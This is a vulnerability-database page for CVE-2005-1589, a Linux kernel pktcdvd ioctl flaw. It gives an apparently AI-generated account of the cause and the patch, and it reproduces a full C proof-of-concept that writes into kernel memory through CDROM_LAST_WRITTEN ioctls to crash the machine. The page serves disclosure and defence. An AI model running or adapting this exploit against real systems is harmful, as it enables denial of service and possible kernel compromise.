CVE-2005-1589
Description
The pkt_ioctl function in the pktcdvd block device ioctl handler (pktcdvd.c) in Linux kernel 2.6.12-rc4 and earlier calls the wrong function before passing an ioctl to the block device, which crosses security boundaries by making kernel address space accessible from user space and allows local users to cause a denial of service and possibly execute arbitrary code, a similar vulnerability to CVE-2005-1264.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2- Range: <=2.6.12-rc4
Patches
Vulnerability mechanics
Root cause
"The pkt_ioctl function incorrectly calls ioctl_by_bdev with user-controlled arguments, allowing access to kernel memory."
Attack vector
A local user with read access to a pktcdvd block device can trigger the vulnerability by calling the `sys_ioctl` system call with the `CDROM_LAST_WRITTEN` command and a crafted argument. This argument points to kernel memory, which the vulnerable function then attempts to access. The exploit attempts to overwrite kernel data structures, leading to a denial of service or arbitrary code execution [ref_id=1].
Affected code
The vulnerability resides in the `pkt_ioctl` function within the `drivers/block/pktcdvd.c` file. Specifically, the `CDROM_LAST_WRITTEN` and `CDROMEJECT` ioctl commands incorrectly use `ioctl_by_bdev` to process their arguments, which can lead to memory corruption [ref_id=2].
What the fix does
The patch replaces the call to `ioctl_by_bdev` with `blkdev_ioctl`. This change ensures that the ioctl command is handled correctly within the kernel's block device layer, preventing the misuse of user-supplied memory addresses and thus closing the security boundary crossing [ref_id=2].
Preconditions
- inputRead access to a device node managed by pktcdvd (e.g., /dev/hdc).
- configThe Linux kernel must be version 2.6.12-rc4 or earlier, and the pktcdvd module must be loaded.
Reproduction
```c /* pktcdvd_dos.c proof-of-concept * This is only a lame POC which will crash the machine, no root shell here. * --- alert7 * 2005-5-15 * the vulnerability in 2.6 up to and including 2.6.12-rc4 * * gcc -o pktcdvd_dos pktcdvd_dos.c * * NOTE: require user can read pktcdvd block device */
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <signal.h> #include <paths.h> #include <grp.h> #include <setjmp.h> #include <stdint.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/ucontext.h> #include <sys/wait.h> #include <asm/ldt.h> #include <asm/page.h> #include <asm/segment.h> #include <linux/unistd.h> #include <linux/linkage.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <linux/sysctl.h> #include <linux/cdrom.h>
#define __NR_sys_ioctl __NR_ioctl
#define PKTCDVDDEVICE "/dev/hdc"
static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long, arg);
struct idtr { unsigned short limit; unsigned int base; } __attribute__ ((packed));
unsigned int get_addr_idt() { struct idtr idtr; asn("sidt %0" : "=m" (idtr)); return idtr.base; } struct desc_struct { unsigned long a,b; }; int main(int argc,char **argv) { unsigned int ptr_idt; int iret ; int fd;
printf("[++]user stack addr %p \n",&ptr_idt); if ( ( (unsigned long )&ptr_idt >>24)==0xfe){ printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n"); return -1; }
ptr_idt=get_addr_idt(); printf("[++]IDT Addr %p \n",ptr_idt);
fd = open(PKTCDVDDEVICE,O_RDONLY); if (fd ==-1) { printf("[--]"); fflush(stdout); perror("open"); return -1; }
unsigned long WriteTo ;
if ( (ptr_idt>>24)==0xc0){ printf("[++]this OS in Real Linux\n"); WriteTo= ptr_idt; }else{ printf("[++]this OS maybe in VMWARE\n"); WriteTo = 0xc0100000; }
printf("[++]call sys_ioctl will crash machine\n"); fflush(stdout);
int loopi; for (loopi=0;loopi<0x100000 ;loopi++ ) { printf("[++]will write data at 0x%x\n",WriteTo+loopi*4); fflush(stdout); iret = sys_ioctl(fd, CDROM_LAST_WRITTEN, WriteTo+loopi*4); if (iret ==-1) { printf("[--]"); fflush(stdout); perror("ioctl"); //if in VMWARE ,rewrite ptr_idt adress will failed printf("[--]still aliving\n"); close(fd); return -1; } } close(fd); return 0; }
// milw0rm.com [2005-05-17] ``` [ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
9- archives.neohapsis.com/archives/vulnwatch/2005-q2/0045.htmlnvdExploitPatchVendor Advisory
- archives.neohapsis.com/archives/vulnwatch/2005-q2/0046.htmlnvd
- archives.neohapsis.com/archives/vulnwatch/2005-q2/0047.htmlnvd
- kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10nvd
- marc.infonvd
- secunia.com/advisories/17826nvd
- www.mandriva.com/security/advisoriesnvd
- www.securityfocus.com/bid/13651nvd
- www.vupen.com/english/advisories/2005/0557nvd
News mentions
0No linked articles in our index yet.